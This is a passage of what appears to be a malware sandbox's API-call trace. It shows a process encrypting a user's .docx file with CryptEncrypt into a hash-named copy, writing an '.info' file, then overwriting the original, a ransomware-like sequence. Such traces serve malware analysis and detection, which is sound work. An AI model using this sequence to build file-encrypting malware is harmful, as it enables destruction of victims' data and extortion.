lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.755] CloseHandle (hObject=0x36c) returned 1 [0074.755] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", lpFilePart=0x0) returned 0x48 [0074.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4b1e059cebd8a7ef3dd31ed52aaf4dd7"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.766] GetFileType (hFile=0x36c) returned 0x1 [0074.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.769] GetFileType (hFile=0x36c) returned 0x1 [0074.769] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0074.775] CloseHandle (hObject=0x36c) returned 1 [0074.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", lpFilePart=0x0) returned 0x48 [0074.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4b1e059cebd8a7ef3dd31ed52aaf4dd7"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.775] GetFileType (hFile=0x36c) returned 0x1 [0074.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.775] GetFileType (hFile=0x36c) returned 0x1 [0074.775] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0074.775] CloseHandle (hObject=0x36c) returned 1 [0074.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.776] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x22963d8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0074.776] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.777] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.777] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22964c8, pdwDataLen=0x1bf5db30 | out: pbData=0x22964c8*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.777] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x22965e8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626fa0) returned 1 [0074.777] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.777] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.777] CryptDuplicateKey (in: hKey=0x1a626fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626d70) returned 1 [0074.777] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.777] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x4, pbData=0x2296730*=0x1, dwFlags=0x0) returned 1 [0074.777] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x1, pbData=0x22966e0, dwFlags=0x0) returned 1 [0074.777] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0074.777] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0074.777] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lm400zl.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.777] GetFileType (hFile=0x36c) returned 0x1 [0074.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.777] GetFileType (hFile=0x36c) returned 0x1 [0074.777] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", lpFilePart=0x0) returned 0x48 [0074.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3b1915656b6e08fc711349bfcd0aaf93"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0074.778] GetFileType (hFile=0x380) returned 0x1 [0074.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.778] GetFileType (hFile=0x380) returned 0x1 [0074.778] ReadFile (in: hFile=0x36c, lpBuffer=0x2296ae0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2296ae0*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0074.779] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22aaaf8*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x22aaaf8*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0074.780] WriteFile (in: hFile=0x380, lpBuffer=0x22aaaf8*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x22aaaf8*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0074.782] ReadFile (in: hFile=0x36c, lpBuffer=0x2296ae0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2296ae0*, lpNumberOfBytesRead=0x1bf5da28*=0x411a, lpOverlapped=0x0) returned 1 [0074.782] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22beb38*, pdwDataLen=0x1bf5da80*=0x4110, dwBufLen=0x4110 | out: pbData=0x22beb38*, pdwDataLen=0x1bf5da80*=0x4110) returned 1 [0074.782] WriteFile (in: hFile=0x380, lpBuffer=0x22beb38*, nNumberOfBytesToWrite=0x4110, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x22beb38*, lpNumberOfBytesWritten=0x1bf5da18*=0x4110, lpOverlapped=0x0) returned 1 [0074.783] ReadFile (in: hFile=0x36c, lpBuffer=0x2296ae0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2296ae0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0074.783] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22c2c88*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x22c2c88*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.783] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22c2cd8*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x22c2cd8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.783] WriteFile (in: hFile=0x380, lpBuffer=0x22c2d28*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x22c2d28*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0074.783] CloseHandle (hObject=0x380) returned 1 [0074.784] CloseHandle (hObject=0x36c) returned 1 [0074.784] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0074.784] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0074.784] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0074.785] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93", lpFilePart=0x0) returned 0x48 [0074.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0074.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3b1915656b6e08fc711349bfcd0aaf93"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.785] GetFileType (hFile=0x36c) returned 0x1 [0074.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0074.785] GetFileType (hFile=0x36c) returned 0x1 [0074.785] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.786] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.787] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.788] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.789] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.789] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.790] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.790] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.790] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.790] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.790] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.790] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.790] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.790] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.792] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.792] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x120, lpOverlapped=0x0) returned 1 [0074.792] ReadFile (in: hFile=0x36c, lpBuffer=0x22c4420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c4420*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0074.792] CloseHandle (hObject=0x36c) returned 1 [0074.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93.info", lpFilePart=0x0) returned 0x4d [0074.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0074.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3B1915656B6E08FC711349BFCD0AAF93.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3b1915656b6e08fc711349bfcd0aaf93.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.794] GetFileType (hFile=0x36c) returned 0x1 [0074.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0074.794] GetFileType (hFile=0x36c) returned 0x1 [0074.794] WriteFile (in: hFile=0x36c, lpBuffer=0x22d0ad0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x22d0ad0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0074.795] CloseHandle (hObject=0x36c) returned 1 [0074.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0074.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lm400zl.docx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d5d2f0, ftCreationTime.dwHighDateTime=0x1d4fa62, ftLastAccessTime.dwLowDateTime=0xd6e5aa20, ftLastAccessTime.dwHighDateTime=0x1d4e427, ftLastWriteTime.dwLowDateTime=0xd6e5aa20, ftLastWriteTime.dwHighDateTime=0x1d4e427, nFileSizeHigh=0x0, nFileSizeLow=0x1811a)) returned 1 [0074.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0074.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.796] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", dwFileAttributes=0x80) returned 1 [0074.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0074.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lm400zl.docx"), fInfoLevelId=0x0, lpFileInformation=0x22d86b8 | out: lpFileInformation=0x22d86b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe2d5d2f0, ftCreationTime.dwHighDateTime=0x1d4fa62, ftLastAccessTime.dwLowDateTime=0xd6e5aa20, ftLastAccessTime.dwHighDateTime=0x1d4e427, ftLastWriteTime.dwLowDateTime=0xd6e5aa20, ftLastWriteTime.dwHighDateTime=0x1d4e427, nFileSizeHigh=0x0, nFileSizeLow=0x1811a)) returned 1 [0074.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0074.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx", lpFilePart=0x0) returned 0x34 [0074.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0074.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LM400zl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lm400zl.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.797] GetFileType (hFile=0x36c) returned 0x1 [0074.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0074.797] GetFileType (hFile=0x36c) returned 0x1 [0074.797] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.798] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.798] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.799] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.800] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.801] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.801] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.807] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.807] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.808] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.809] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.810] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22d8b40*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.810] WriteFile (in: hFile=0x36c, lpBuffer=0x22d8b40*, 